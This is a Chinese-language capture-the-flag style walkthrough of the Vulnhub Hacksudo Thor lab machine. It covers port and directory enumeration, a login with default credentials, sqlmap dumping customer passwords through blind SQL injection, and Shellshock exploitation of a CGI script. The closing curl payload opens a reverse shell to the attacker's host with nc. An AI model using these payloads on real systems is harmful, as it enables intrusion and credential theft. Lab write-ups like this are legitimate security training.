Vulnhub之Hacksudo Thor靶机详细测试过程
Hacksudo Thor
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:c1:4a:6a 1 60 PCS Systemtechnik GmbH
192.168.56.212 08:00:27:d0:de:1d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址192.168.56.212
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.212 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-06 08:51 EST
Nmap scan report for 192.168.56.212
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA)
| 256 349a57607d6670d5b5ff4796e0362375 (ECDSA)
|_ 256 ae7deefe1dbc994d54453d6116f86c87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:D0:DE:1D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.68 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP),以及21(filtered),会不会存在端口knock?
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ ftp 192.168.56.212
ftp: Can't connect to `192.168.56.212:21': Connection refused
ftp: Can't connect to `192.168.56.212:ftp'
ftp> quit
──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ nikto -h http://192.168.56.212
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.212
+ Target Hostname: 192.168.56.212
+ Target Port: 80
+ Start Time: 2023-01-06 08:55:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-01-06 08:56:44 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.212
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/06 08:57:24 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.212/fonts/]
/server-status (Status: 403) [Size: 279]
Progress: 218003 / 220561 (98.84%)===============================================================
2023/01/06 08:57:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.js,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.212
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: sh,html,php,txt,js
[+] Timeout: 10s
===============================================================
2023/01/06 08:57:51 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 5357]
/images (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/contact.php (Status: 200) [Size: 4164]
/news.php (Status: 200) [Size: 8062]
/home.php (Status: 200) [Size: 5345]
/header.php (Status: 200) [Size: 472]
/connect.php (Status: 200) [Size: 0]
/navbar.php (Status: 200) [Size: 1515]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.212/fonts/]
/transactions.php (Status: 302) [Size: 8163] [--> home.php]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/customer_profile.php (Status: 302) [Size: 7274] [--> home.php]
Progress: 1321732 / 1323366 (99.88%)===============================================================
2023/01/06 08:59:19 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ dirb http://192.168.56.212
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jan 6 09:01:08 2023
URL_BASE: http://192.168.56.212/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.212/ ----
+ http://192.168.56.212/cgi-bin/ (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.212/fonts/
==> DIRECTORY: http://192.168.56.212/images/
+ http://192.168.56.212/index.php (CODE:200|SIZE:5357)
+ http://192.168.56.212/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.212/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.212/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Jan 6 09:01:10 2023
DOWNLOADED: 4612 - FOUND: 3
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.txt,.js,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.212
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/01/06 09:04:02 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/contact.php (Status: 200) [Size: 4164]
/news.php (Status: 200) [Size: 8062]
/home.php (Status: 200) [Size: 5345]
/index.php (Status: 200) [Size: 5357]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.212/fonts/]
/header.php (Status: 200) [Size: 472]
/connect.php (Status: 200) [Size: 0]
/server-status (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/navbar.php (Status: 200) [Size: 1515]
/transactions.php (Status: 302) [Size: 8163] [--> home.php]
/admin_login.php (Status: 200) [Size: 1511]
Progress: 135383 / 373710 (36.23%)[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.html": net/url: invalid control character in URL
Progress: 142599 / 373710 (38.16%)[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.html": net/url: invalid control character in URL
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 5357]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 373435 / 373710 (99.93%)===============================================================
2023/01/06 09:04:28 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.txt,.js,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.212
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,js,sh,html
[+] Timeout: 10s
===============================================================
2023/01/06 09:05:30 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htaccess.js (Status: 403) [Size: 279]
/.htaccess.sh (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.js (Status: 403) [Size: 279]
/.htpasswd.sh (Status: 403) [Size: 279]
/admin_login.php (Status: 200) [Size: 1511]
/cgi-bin/ (Status: 403) [Size: 279]
/cgi-bin/.php (Status: 403) [Size: 279]
/cgi-bin/.html (Status: 403) [Size: 279]
/connect.php (Status: 200) [Size: 0]
/contact.php (Status: 200) [Size: 4164]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.212/fonts/]
/header.php (Status: 200) [Size: 472]
/home.php (Status: 200) [Size: 5345]
/images (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/index.php (Status: 200) [Size: 5357]
/navbar.php (Status: 200) [Size: 1515]
/news.php (Status: 200) [Size: 8062]
/server-status (Status: 403) [Size: 279]
/transactions.php (Status: 302) [Size: 8163] [--> home.php]
Progress: 114447 / 122862 (93.15%)===============================================================
2023/01/06 09:05:37 Finished
===============================================================
发现了/admin_login.php
用burpsuite拦截请求,保存为请求文件,用SQLMAP进行扫描
──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -r req.txt --level=3
但是没有发现SQL注入漏洞,并且手动测试各种登录验证绕过语句也失败。
到目前无论是目录文件扫描或者SQL注入漏洞扫描都没有太大的收获,除了识别出admin的登录入口
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ dirsearch -u http://192.168.56.212 -e *
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: nmap_full_scan | HTTP method: GET | Threads: 30 | Wordlist size: 9009
Output File: /home/kali/.dirsearch/reports/192.168.56.212/_23-01-06_09-21-54.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-01-06_09-21-54.log
Target: http://192.168.56.212/
[09:21:54] Starting:
[09:21:55] 403 - 279B - /.ht_wsr.txt
[09:21:55] 403 - 279B - /.htaccess.bak1
[09:21:55] 403 - 279B - /.htaccess_extra
[09:21:55] 403 - 279B - /.htaccess_orig
[09:21:55] 403 - 279B - /.htaccess.sample
[09:21:55] 403 - 279B - /.htaccess.save
[09:21:55] 403 - 279B - /.htaccess.orig
[09:21:55] 403 - 279B - /.htaccessOLD
[09:21:55] 403 - 279B - /.htaccessBAK
[09:21:55] 403 - 279B - /.html
[09:21:55] 403 - 279B - /.htaccess_sc
[09:21:55] 403 - 279B - /.htm
[09:21:55] 403 - 279B - /.htaccessOLD2
[09:21:55] 403 - 279B - /.httr-oauth
[09:21:55] 403 - 279B - /.htpasswds
[09:21:55] 403 - 279B - /.htpasswd_test
[09:21:55] 403 - 279B - /.php
[09:21:57] 200 - 4KB - /README.md
[09:22:02] 403 - 279B - /cgi-bin/
[09:22:05] 301 - 316B - /fonts -> http://192.168.56.212/fonts/
[09:22:06] 200 - 5KB - /home.php
[09:22:06] 301 - 317B - /images -> http://192.168.56.212/images/
[09:22:06] 200 - 4KB - /images/
[09:22:06] 200 - 5KB - /index.php
[09:22:06] 200 - 5KB - /index.php/login/
[09:22:12] 403 - 279B - /server-status
[09:22:12] 403 - 279B - /server-status/
Task Completed
──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ curl http://192.168.56.212/README.md
## Disclaimer
<b><i>This project should not be modified in any way and used anywhere else without my permission.</b></i>
If you use this project for phishing purposes after modifying the source code / or by any other means, remember that the original project has nothing to do with phishing or any other malicious purpose. Any loss of data or unauthorized access which happened because of such phishing kits would not be my responsibility as that is not my original code. Strict legal action would be taken if someone is found modifying it and using it for any unethical purpose.
# Online Banking System
A web based banking system with all essential features and security accompanied by a beautiful and simple website. The website is designed in accordance with google material design and resposive web design guidelines to ensure a seamless experience between devices.
A fictional name of "Dolphin Bank" has been used only for representative purposes.
## Built with
<b>HTML5, CSS, JavaScript</b> & <b>jQuery</b> used for front-end design.
<b>PHP7 & MySQL</b> used for back-end design.
<b>Oracle MySQL</b> has been used to create and host the database for the
internet banking website.
Other than the languages/tools mentioned above <b>no</b> other/external
libraries and/or web-page templates have been used, everything has been
coded from ground-up straight from scratch.
## How to build/use
Setup an environment which supports web development like <b>LAMP</b> on <b>Linux</b> systems OR install <b>WampServer/XAMPP</b> or anything similar on <b>Windows</b>.
Copy the folder [net-banking](https://github.com/zakee94/online-banking-system/tree/master/net-banking) or the files in it to the location of the localhost. For example "/var/www/html", the loaction of localhost in Ubuntu.
Import the [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql) database into your MySQL setup.
Edit the file [connect.php](https://github.com/zakee94/online-banking-system/blob/master/net-banking/connect.php) and give proper username and password of your MySQL setup.
Open a browser and test wether the setup works or not by visiting the home page. Type "localhost/home.php" as the URL in the browser to visit the home page.
All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql).
However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".
Some useful links to help in proper setup :
* [Installing LAMP](https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-14-04)
* [WampServer](http://www.wampserver.com/en/)
* [Importing database in MySQL](https://www.digitalocean.com/community/tutorials/how-to-import-and-export-databases-and-reset-a-root-password-in-mysql)
## Details about the project
An exhaustive list of features, documentation, design hierarchy, details about the web pages, database, design characterstics/features and a lot more can be found [here](https://drive.google.com/open?id=1Px2shjcmyLUv7-u5wp93HvKT_zvw-Pmk).
The ER Diagram can also be found on the link given above or can be viewed [here](https://drive.google.com/open?id=1Tn2fBR9IjLP8dlv6svrc4aEvryrYcI3G).
## Description of the various folders
- <b>/net-banking :</b> Contains the source code of the website
- <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website
- <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website
## Screenshots (more can be found [here](https://drive.google.com/open?id=1bLLNyEiVGoWgHDfOehGooYSAZUNtj85F))
## Authors
* [zakee94](https://github.com/zakee94/)
访问作者github
在作者的github中有个online bank的项目,其中有段说明文字:
However some important usernames and passwords are provided below :
Username of admin is "admin" & password is "password123".
Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".
这应该是管理员的用户名和密码,发现可以成功登录
浏览了一下管理后台页面,没有发现可以上传文件的入口,但是是否有个地方存在SQL注入漏洞
http://192.168.56.212/edit_customer.php?cust_id=1
用SQLMAP测试,发现确实存在SQL注入漏洞,先扫描有哪些数据库,然后选择数据库hacksudo看有哪些表,对照github上的源代码,接下来应该把customer中的用户名和密码给dump出来
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -u http://192.168.56.212/edit_customer.php?cust_id=1 --cookie='PHPSESSID="5ag0i47uggl4mv8l32cq602j8h"' --level=3
___
__H__
___ ___[,]_____ ___ ___ {1.6.12#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -u http://192.168.56.212/edit_customer.php?cust_id=1 --cookie='PHPSESSID="5ag0i47uggl4mv8l32cq602j8h"' --level=3 --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.6.12#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -u http://192.168.56.212/edit_customer.php?cust_id=1 --cookie='PHPSESSID="5ag0i47uggl4mv8l32cq602j8h"' --level=3 -D hacksudo --tables
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -u http://192.168.56.212/edit_customer.php?cust_id=1 --cookie='PHPSESSID="5ag0i47uggl4mv8l32cq602j8h"' --level=3 -D hacksudo -T customer -C uname,pwd --dump
___
__H__
___ ___[(]_____ ___ ___ {1.6.12#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:59:13 /2023-01-06/
[09:59:13] [INFO] resuming back-end DBMS 'mysql'
[09:59:13] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.56.212:80/home.php'. Do you want to follow? [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cust_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cust_id=1 AND (SELECT 9791 FROM (SELECT(SLEEP(5)))dUkE)
---
[09:59:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:59:17] [INFO] fetching entries of column(s) 'pwd,uname' for table 'customer' in database 'hacksudo'
[09:59:17] [INFO] fetching number of column(s) 'pwd,uname' entries for table 'customer' in database 'hacksudo'
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[09:59:28] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
4
[09:59:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[09:59:44] [INFO] adjusting time delay to 1 second due to good response times
nafees123
[10:00:03] [INFO] retrieved: zakee94
[10:00:25] [INFO] retrieved: salman123
[10:00:49] [INFO] retrieved: salman
[10:01:06] [INFO] retrieved: snow123
[10:01:29] [INFO] retrieved: jon
[10:01:41] [INFO] retrieved: tushar123
[10:02:07] [INFO] retrieved: tushar
Database: hacksudo
Table: customer
[4 entries]
+---------+-----------+
| uname | pwd |
+---------+-----------+
| zakee94 | nafees123 |
| salman | salman123 |
| jon | snow123 |
| tushar | tushar123 |
+---------+-----------+
[10:02:26] [INFO] table 'hacksudo.customer' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.212/dump/hacksudo/customer.csv'
[10:02:26] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.212'
[*] ending @ 10:02:26 /2023-01-06/
尝试用这些用户名和密码登录SSH,均告失败。看来这个方向是错误的
news.php文件的源代码注释中:
<!-- cgi-bin ---!>
可能该目录下有执行文件
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ dirsearch -u http://192.168.56.212/cgi-bin/ -f -e cgi,sh
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: cgi, sh | HTTP method: GET | Threads: 30 | Wordlist size: 16514
Output File: /home/kali/.dirsearch/reports/192.168.56.212/-cgi-bin-_23-01-06_10-11-25.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-01-06_10-11-25.log
Target: http://192.168.56.212/cgi-bin/
[10:11:25] Starting:
[10:11:26] 403 - 279B - /cgi-bin/.ht_wsr.txt
[10:11:26] 403 - 279B - /cgi-bin/.htpasswd_test
[10:11:26] 403 - 279B - /cgi-bin/.htaccess.bak1
[10:11:26] 403 - 279B - /cgi-bin/.htaccess.sample
[10:11:26] 403 - 279B - /cgi-bin/.htaccess.orig
[10:11:26] 403 - 279B - /cgi-bin/.htaccess.save
[10:11:26] 403 - 279B - /cgi-bin/.htaccess_orig
[10:11:26] 403 - 279B - /cgi-bin/.htaccess_sc
[10:11:26] 403 - 279B - /cgi-bin/.htaccess_extra
[10:11:26] 403 - 279B - /cgi-bin/.htaccessBAK
[10:11:26] 403 - 279B - /cgi-bin/.htaccessOLD2
[10:11:26] 403 - 279B - /cgi-bin/.htaccessOLD
[10:11:26] 403 - 279B - /cgi-bin/.html
[10:11:26] 403 - 279B - /cgi-bin/.htm
[10:11:26] 403 - 279B - /cgi-bin/.htpasswds
[10:11:26] 403 - 279B - /cgi-bin/.httr-oauth
[10:11:26] 403 - 279B - /cgi-bin/.php
[10:11:38] 500 - 612B - /cgi-bin/backup.cgi
[10:12:01] 500 - 612B - /cgi-bin/shell.sh
扫描backup.cgi是否存在破壳漏洞
──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.212
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-06 10:12 EST
Nmap scan report for 192.168.56.212
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| Exploit results:
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>500 Internal Server Error</title>
| </head><body>
| <h1>Internal Server Error</h1>
| <p>The server encountered an internal error or
| misconfiguration and was unable to complete
| your request.</p>
| <p>Please contact the server administrator at
| webmaster@localhost to inform them of the time this error occurred,
| and the actions you performed just before this error.</p>
| <p>More information about this error may be available
| in the server error log.</p>
| <hr>
| <address>Apache/2.4.38 (Debian) Server at 192.168.56.212 Port 80</address>
| </body></html>
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_ http://seclists.org/oss-sec/2014/q3/685
|_http-server-header: Apache/2.4.38 (Debian)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" \http://192.168.56.212/cgi-bin/backup.cgi
uid=33(www-data) gid=33(www-data) groups=33(www-data)
用下述载荷反弹shell
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.56.206 5555'" \http://192.168.56.212/cgi-bin/backup.cgi
STRIVE FOR PROGRESS,NOT FOR PERFECTION
